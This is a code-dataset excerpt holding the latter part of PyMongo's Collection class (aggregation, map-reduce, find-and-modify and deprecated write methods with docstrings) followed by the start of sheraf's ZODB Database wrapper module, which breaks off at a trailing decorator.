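          >>> pipeline = [{'$group': {'_id': '$author', 'count': {'$sum': 1}}}]
          >>> cursor = db.test.aggregate(pipeline, allowDiskUse=True)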
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
if not isinstance(pipeline, list):
raise TypeError("pipeline must be a list")
if "explain" in kwargs:
raise ConfigurationError("The explain option is not supported. "
"Use Database.command instead.")
cmd = SON([("aggregate", self.__name),
("pipeline", pipeline)])
# Remove things that are not command options.
batch_size = common.validate_positive_integer_or_none(
"batchSize", kwargs.pop("batchSize", None))
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor", True))
# If the server does not support the "cursor" option we
# ignore useCursor and batchSize.
with self._socket_for_reads() as (sock_info, slave_ok):
if sock_info.max_wire_version > 0:
if use_cursor:
if "cursor" not in kwargs:
kwargs["cursor"] = {}
if batch_size is not None:
kwargs["cursor"]["batchSize"] = batch_size
cmd.update(kwargs)
# Apply this Collection's read concern if $out is not in the
# pipeline.
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
if pipeline and '$out' in pipeline[-1]:
result = self._command(sock_info, cmd, slave_ok)
else:
result = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern)
else:
result = self._command(sock_info, cmd, slave_ok)
if "cursor" in result:
cursor = result["cursor"]
else:
# Pre-MongoDB 2.6. Fake a cursor.
cursor = {
"id": 0,
"firstBatch": result["result"],
"ns": self.full_name,
}
return CommandCursor(
self, cursor, sock_info.address).batch_size(batch_size or 0)
# key and condition ought to be optional, but deprecation
# would be painful as argument order would have to change.
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
Returns an array of grouped items.
The `key` parameter can be:
- ``None`` to use the entire document as a key.
- A :class:`list` of keys (each a :class:`basestring`
(:class:`str` in python 3)) to group by.
- A :class:`basestring` (:class:`str` in python 3), or
:class:`~bson.code.Code` instance containing a JavaScript
function to be applied to each document, returning the key
to group by.
The :meth:`group` method obeys the :attr:`read_preference` of this
:class:`Collection`.
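        For example, to count documents per ``category`` (a hypothetical
        field, shown for illustration only)::
          >>> results = db.test.group(
          ...     key=["category"],
          ...     condition={},
          ...     initial={"count": 0},
          ...     reduce="function(obj, prev) { prev.count += 1; }")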
:Parameters:
- `key`: fields to group by (see above description)
- `condition`: specification of rows to be
considered (as a :meth:`find` query specification)
- `initial`: initial value of the aggregation counter object
- `reduce`: aggregation function as a JavaScript string
- `finalize`: function to be called on each object in output list.
- `**kwargs` (optional): additional arguments to the group command
may be passed as keyword arguments to this helper method
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
cmd.update(kwargs)
with self._socket_for_reads() as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok)["retval"]
def rename(self, new_name, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
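        For example (illustrative; assumes no collection named ``new_test``
        already exists in this database)::
          >>> db.test.rename("new_test")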
:Parameters:
- `new_name`: new name for this collection
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
sock_info.command('admin', cmd)
def distinct(self, key, filter=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
        - `maxTimeMS` (int): The maximum amount of time to allow the distinct
          command to run, in milliseconds.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
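        For example, assuming documents that carry ``x`` and ``y`` fields (the
        field names and the values returned below are illustrative only)::
          >>> db.test.distinct("x", {"y": {"$gt": 0}})
          [1, 2, 3]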
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `**kwargs` (optional): See list of options above.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
cmd.update(kwargs)
with self._socket_for_reads() as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern)["values"]
def map_reduce(self, map, reduce, out, full_response=False, **kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
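        A fuller sketch, assuming documents that carry a ``tags`` array field
        (the field name and the ``tag_counts`` output collection are
        illustrative only)::
          >>> from bson.code import Code
          >>> mapper = Code("function () {"
          ...               "  this.tags.forEach(function(t) { emit(t, 1); });"
          ...               "}")
          >>> reducer = Code(
          ...     "function (key, values) { return Array.sum(values); }")
          >>> result = db.test.map_reduce(mapper, reducer, "tag_counts")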
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, collections.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
cmd.update(kwargs)
with self._socket_for_primary_reads() as (sock_info, slave_ok):
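            # MongoDB 3.2+ (wire version 4) honors readConcern for mapReduce,
            # but only when results are returned inline rather than written to
            # an output collection.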
if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and
'inline' in cmd['out']):
response = self._command(
sock_info, cmd, slave_ok, ReadPreference.PRIMARY,
read_concern=self.read_concern)
else:
response = self._command(
sock_info, cmd, slave_ok, ReadPreference.PRIMARY)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, **kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
"""
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", {"inline": 1})])
cmd.update(kwargs)
with self._socket_for_reads() as (sock_info, slave_ok):
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
res = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern)
else:
res = self._command(sock_info, cmd, slave_ok)
if full_response:
return res
else:
return res.get("results")
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
with self._socket_for_writes() as sock_info:
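            # MongoDB 3.2+ (wire version 4) accepts a writeConcern option for
            # findAndModify; forward this collection's write concern unless the
            # caller supplied one explicitly.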
if sock_info.max_wire_version >= 4 and 'writeConcern' not in cmd:
wc_doc = self.write_concern.document
if wc_doc:
cmd['writeConcern'] = wc_doc
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR])
_check_write_command_response([(0, out)])
return out.get("value")
def find_one_and_delete(self, filter,
projection=None, sort=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
        {u'_id': 665, u'done': False, u'count': 25}
By default :meth:`find_one_and_update` returns the original version of
the document before the update was applied. To return the updated
version of the document instead, use the *return_document* option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
            always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
with self._socket_for_writes() as sock_info:
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(sock_info, to_save, True,
check_keys, manipulate, write_concern)
else:
self._update(sock_info, {"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
with self._socket_for_writes() as sock_info:
return self._insert(sock_info, doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
with self._socket_for_writes() as sock_info:
return self._update(sock_info, spec, document, upsert,
check_keys, multi, manipulate, write_concern)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, collections.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
with self._socket_for_writes() as sock_info:
return self._delete(sock_info, spec_or_id, multi, write_concern)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, _ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
if sock_info.max_wire_version >= 4 and 'writeConcern' not in cmd:
wc_doc = self.write_concern.document
if wc_doc:
cmd['writeConcern'] = wc_doc
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR])
_check_write_command_response([(0, out)])
if not out['ok']:
if out["errmsg"] == _NO_OBJ_ERROR:
return None
else:
# Should never get here b/c of allowable_errors
raise ValueError("Unexpected Error: %s" % (out,))
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
| 42.694197 | 91 | 0.58049 |
4ee41c96ec0c98673051bf2f3ed7cd9d587ad32a | 13,191 | py | Python | sheraf/databases.py | yaal-fr/sheraf | 9821a53d8b0ea0aba420175e4cfa81529262f88c | [
"MIT"
] | 1 | 2020-03-18T09:54:52.000Z | 2020-03-18T09:54:52.000Z | sheraf/databases.py | yaal-fr/sheraf | 9821a53d8b0ea0aba420175e4cfa81529262f88c | [
"MIT"
] | null | null | null | sheraf/databases.py | yaal-fr/sheraf | 9821a53d8b0ea0aba420175e4cfa81529262f88c | [
"MIT"
] | null | null | null | import contextlib
import os
import traceback
from contextvars import ContextVar
import transaction
import ZODB.config
import ZODB.DB
import zodburi
from ZODB.DemoStorage import DemoStorage
from sheraf.exceptions import ConnectionAlreadyOpened
# Isolated contexts state
global_context_connections_state = ContextVar("global_context_connections_state")
global_context_last_connection_state = ContextVar(
"global_context_last_connection_state"
)
class LocalData:
instance = None
def __init__(self, pid=None):
self.pid = pid or os.getpid()
self.databases = {}
self.last_database_context = {}
self.zodb_databases = {}
class GlobalThreadContext:
@property
def connections(self):
try:
return global_context_connections_state.get()
except LookupError:
global_context_connections_state.set([])
return global_context_connections_state.get()
@property
def last_connection_context(self):
try:
return global_context_last_connection_state.get()
except LookupError:
global_context_last_connection_state.set(None)
return global_context_last_connection_state.get()
@last_connection_context.setter
def last_connection_context(self, value):
global_context_last_connection_state.set(value)
def reset_connections_state(self):
global_context_connections_state.set([])
global_context_last_connection_state.set(None)
self.thread_context = GlobalThreadContext()
@classmethod
def get(cls):
# TODO: put a lock on pid
pid = os.getpid()
if not cls.instance or cls.instance.pid != pid:
cls.instance = LocalData(pid)
return cls.instance
# Isolated context state
database_context_connections_state = ContextVar("database_context_connections_state")
class Database(object):
"""A ZODB :class:`ZODB.DB` wrapper with a :class:`ZODB.interfaces.IStorage`
factory.
The storage factory will either create a
:class:`~ZEO.ClientStorage.ClientStorage`, a
:class:`~ZODB.FileStorage.FileStorage.FileStorage`, a
:class:`~ZODB.DemoStorage.DemoStorage`, a Relstorage
:class:`~relstorage.adapters.postgresql.adapter.PostgreSQLAdapter` or use a
user defined storage depending on the argument passed at the initialization
of the object.
A Storage object is created and pass it to the :class:`ZODB.DB` constructor
Several connections can be used at the same time. The connections are
identified by their name.
:param database_name: The name of the connection.
:param storage: If set, this user defined storage will be used.
:param uri: A zodburi to the database.
:type uri: An URI that will be parsed by :func:`zodburi.resolve_uri`.
:param db_args: Arguments to pass to the :class:`ZODB.DB`.
:param nestable: If `False`, will raise a
:class:`~sheraf.exceptions.ConnectionAlreadyOpened` if a connection has
already been opened.
"""
DEFAULT_DATABASE_NAME = "unnamed"
def __init__(self, uri=None, storage=None, nestable=False, db_args=None):
self.nestable = nestable
self.uri = uri
self.db = None
self.storage = None
self.db_args = db_args or {}
class DatabaseThreadContext:
@property
def connections(self):
try:
return database_context_connections_state.get()
except LookupError:
database_context_connections_state.set([])
return database_context_connections_state.get()
def reset_connections_state(self):
database_context_connections_state.set([])
self.thread_context = DatabaseThreadContext()
self.db_args["databases"] = LocalData.get().zodb_databases
self.reset(storage, uri)
stack = traceback.extract_stack()[-2]
LocalData.get().last_database_context[self.name] = (
stack.filename,
stack.lineno,
)
def __repr__(self):
description = "<Database database_name='{}'".format(self.name)
if self.db_args.get("read_only", False):
description += " ro"
if self.nestable:
description += " nestable"
description += ">"
return description
def reset(self, storage=None, uri=None):
"""Close and reopen a database connection."""
if self.db:
self.close()
if storage is not None:
self.storage = storage
elif uri:
storage_factory, db_args = zodburi.resolve_uri(uri)
self.storage = storage_factory()
db_args.update(self.db_args)
self.db_args = db_args
else:
self.storage = DemoStorage()
self.name = self.db_args.get("database_name", Database.DEFAULT_DATABASE_NAME)
if self.name in LocalData.get().databases:
last_context = LocalData.get().last_database_context.get(self.name)
raise KeyError(
"A database named '{}' already exists. Last opening was on {} at line {}".format(
self.name, last_context[0], last_context[1]
)
if last_context
else "A database named '{}' already exists.".format(self.name)
)
self.db = ZODB.DB(self.storage, **self.db_args)
LocalData.get().databases[self.name] = self
def connection_open(self):
"""Opens a connection. Returns a connection to this database.
If `nestable` is set and a connection has already been opened,
raises a :class:`~sheraf.exceptions.ConnectionAlreadyOpened` exception.
If `nestable` is False
and a connection has already been opened, it returns a new connection
with a new transaction_manager.
:return: A :class:`~ZODB.Connection.Connection` object.
"""
data = LocalData.get()
# No other connection exists
if not Database.last_connection():
connection = self.db.open()
# A connection to this database exists, and the second one is not allowed.
elif not self.nestable:
message = (
"First connection was {} on {} at line {}".format(
Database.last_connection(),
*data.thread_context.last_connection_context
)
if data.thread_context.last_connection_context
else "First connection was {}".format(Database.last_connection())
)
raise ConnectionAlreadyOpened(message)
# A connection to this database exists, and the second one is allowed, but
# with a new transaction manager.
else:
connection = self.db.open(
transaction_manager=transaction.TransactionManager()
)
self.thread_context.connections.append(connection)
data.thread_context.connections.append(connection)
return connection
def connection_close(self, connection=None):
"""Closes a connection opened on the database.
:param connection: The connection to close, if `None` the last
connection opened on the database is closed.
"""
connection = connection or Database.last_connection(self)
if connection.opened:
connection.close()
if connection in LocalData.get().thread_context.connections:
LocalData.get().thread_context.connections.remove(connection)
if connection in self.thread_context.connections:
self.thread_context.connections.remove(connection)
def close(self):
"""Closes the database."""
data = LocalData.get()
for connection in list(self.thread_context.connections):
if connection and connection.opened:
connection.close()
data.thread_context.connections.remove(connection)
self.thread_context.connections.remove(connection)
if self.db:
self.db.close()
if self.name in data.databases:
del data.databases[self.name]
if self.name in data.zodb_databases:
del data.zodb_databases[self.name]
if self.name in data.last_database_context:
del data.last_database_context[self.name]
self.db = None
self.storage = None
@contextlib.contextmanager
def connection(
self, commit=False, cache_minimize=False, reuse=False, _trackeback_shift=0
):
"""A context manager opening a connection on this database.
:param commit: Whether to commit the transaction when leaving the
context manager.
:type commit: boolean
:param cache_minimize: Whether to call
:func:`ZODB.Connection.Connection.cache_minimize` when leaving the
context manager.
:type cache_minimize: boolean
:param reuse: If a connection is already opened, reuse it.
:type reuse: boolean
>>> database = sheraf.Database()
>>> with database.connection() as connection:
... sheraf.Database.current_connection() is connection
True
"""
if reuse and Database.last_connection(self):
yield Database.last_connection(self)
return
_connection = self.connection_open()
if not self.nestable:
stack = traceback.extract_stack()[-3 - _trackeback_shift]
LocalData.get().thread_context.last_connection_context = (
stack.filename,
stack.lineno,
)
try:
yield _connection
if commit:
_connection.transaction_manager.commit()
except BaseException:
if commit and _connection.transaction_manager:
_connection.transaction_manager.abort()
raise
finally:
# TODO: to be changed with try/except NoTransaction when upgrading transaction>2.0 @cedric
if not commit and _connection.transaction_manager:
_connection.transaction_manager.abort()
if cache_minimize:
for conn in _connection.connections.values():
conn.cacheMinimize()
self.connection_close(_connection)
@classmethod
def last_connection(cls, database=None):
if database:
return (
database.thread_context.connections[-1]
if database.thread_context.connections
else None
)
return (
LocalData.get().thread_context.connections[-1]
if LocalData.get().thread_context.connections
else None
)
@classmethod
def current_connection(cls, database_name=None):
if not Database.last_connection():
return None
if not database_name:
return Database.last_connection()
return Database.last_connection().get_connection(database_name)
@classmethod
def current_name(cls):
if Database.last_connection():
return Database.last_connection().db().database_name
return None
@classmethod
def all(cls):
"""
:return: A list containing all the existing :class:`Database` in a
tuple `(name, Database)`.
"""
return LocalData.get().databases.items()
@classmethod
def get(cls, database_name=None):
"""
:param database_name: The name of the queried database.
:return: The database object if it exists. A :class:`KeyError` is raised elsewise.
"""
database_name = database_name or Database.DEFAULT_DATABASE_NAME
try:
return LocalData.get().databases[database_name]
except KeyError:
raise KeyError("No database named '{}'.".format(database_name))
@classmethod
def get_or_create(cls, **kwargs):
"""
:return: The database object if it exists. If the database does not exist, it is created with the `kwargs` arguments.
"""
try:
return Database.get(database_name=kwargs.get("database_name"))
except KeyError:
return Database(**kwargs)
@contextlib.contextmanager
